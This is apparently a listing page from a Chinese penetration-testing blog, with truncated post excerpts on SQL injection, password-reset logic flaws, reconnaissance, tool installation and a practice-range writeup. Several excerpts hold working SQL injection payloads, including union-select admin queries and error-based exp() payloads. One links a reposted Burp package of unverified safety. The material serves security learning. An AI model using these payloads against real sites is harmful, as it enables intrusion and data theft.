反序列化漏洞(1)-前置知识
前置知识一:类对象方法类(Class): 用来描述具有相同的属性和方法的对象的集合。它定义了该集合中每个对象所共有的属性和方法。对象是类的实例。对象:通过类定义的数据结构实例。对象包括两个数据成员(类变量和实例变量)和方法。对象:某一个具体的事物、实体或事例类是类型,比如人类,犬类;对象是某种类的一个实例(实际的例子),比如身为人类的你就是一个对象,你家养的狗就属于犬类的一个对象,或者说一个实例
access注入
速查联合查询?id=1 and exists(select * from admin) //判断表和字段?id=1 and 1=2 union select top 1 1,username,3,4,5,6,7,8,9,10 from admin order by 2 desc //查询字段内容?id =1 and 1=3 union select top 5 1,username,3,4,
逻辑漏洞-密码找回(1)
注意测试密码找回漏洞时最好先走一遍整个找回的流程,注意跳转的链接和数据包里的内容密码找回步骤一般分为4步: 安全认证,通常是输入账号 手机号 邮箱等身份校验,目标会下发验证码到接受端(手机或邮箱)密码重置,输入新密码成功重置密码找回逻辑含有用户标志(用户名、用户ID、cookie)、接收端(手机、邮箱)、凭证(验证码、token)、当前步骤等四个要素,若这四个要素没有完整关联,则可能导致任意
mysql注入
mysql注入汇总-不定期更新ing目录数据库构成布尔盲注报错注入1.数据库构成数据库是大量数据的集合,我们安装完phpstudy之后,如图打开mysql-front:这是一个数据库管理软件,我们可以通过它很方便的管理其中的数据吗,打开后如图: 红框标记的地方就是一个个库,选中其中一个库就会看到很多表:表其实就是和excel表格一样:总结: 库:就是一堆表组成的数据集合表:类似 Exc
mysql报错注入
报错注入-构造 payload 让信息通过错误提示回显出来语句速查表数据溢出5.5.44成功/5.5.53失败?id=1' union select 1,2,exp(\~(select\*from(select user())x))-- +?id=1' union select 1,2,(\~(select \* from (select user())x)%2B1)--
新时代的渗透思路!微服务下的信息搜集(II)
# 微服务下的信息搜集(II)我是掌控安全的咸鱼-魔术手,上次讲了 ***微服务下的信息收集(一)***,这次来水一下 ***微服务下的信息收集(II)***。上次介绍了一个公司的站点可能由各个独立在不同服务器上的服务组成,所以我们需要想尽办法找到更多的域名;为了更好的测试我们也需要找到更多的`目录`和`参数`。上次介绍可以从目标的微信小程序搜集域名,也介绍了一款可以帮助我们收集目标`js`里
burp安装&Chrome安装插件
录了视频,放在百度云链接:https://pan.baidu.com/s/1ghDIIgD-gyQogCQudIe1Lg 提取码:5bxw 复制这段内容后打开百度网盘手机App,操作更方便哦P.s:插件推荐火狐,不推荐谷歌
猫舍 writeup
目标url:http://117.41.229.122:8003/?id=1第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常构造 ?id=1 and 1=1 order by 2 回车页面
Kali的安装与介绍软件下载引导
首先我们需要下载虚拟机软件,VMware,点击即可进入官网 找到右侧的下载按钮,下载免费试用版本即可,下载windows版本安装即可VMware下载地址:http://download3.vmware.com/software/wkst/file/VMware-workstation-full-15.0.2-10952284.exe官网地址:h
BURP-安装包附教程
BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通过拦截HTTP/HTTPS的web数据包,当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试。(转载工具,安全性自查,仅为方便大家使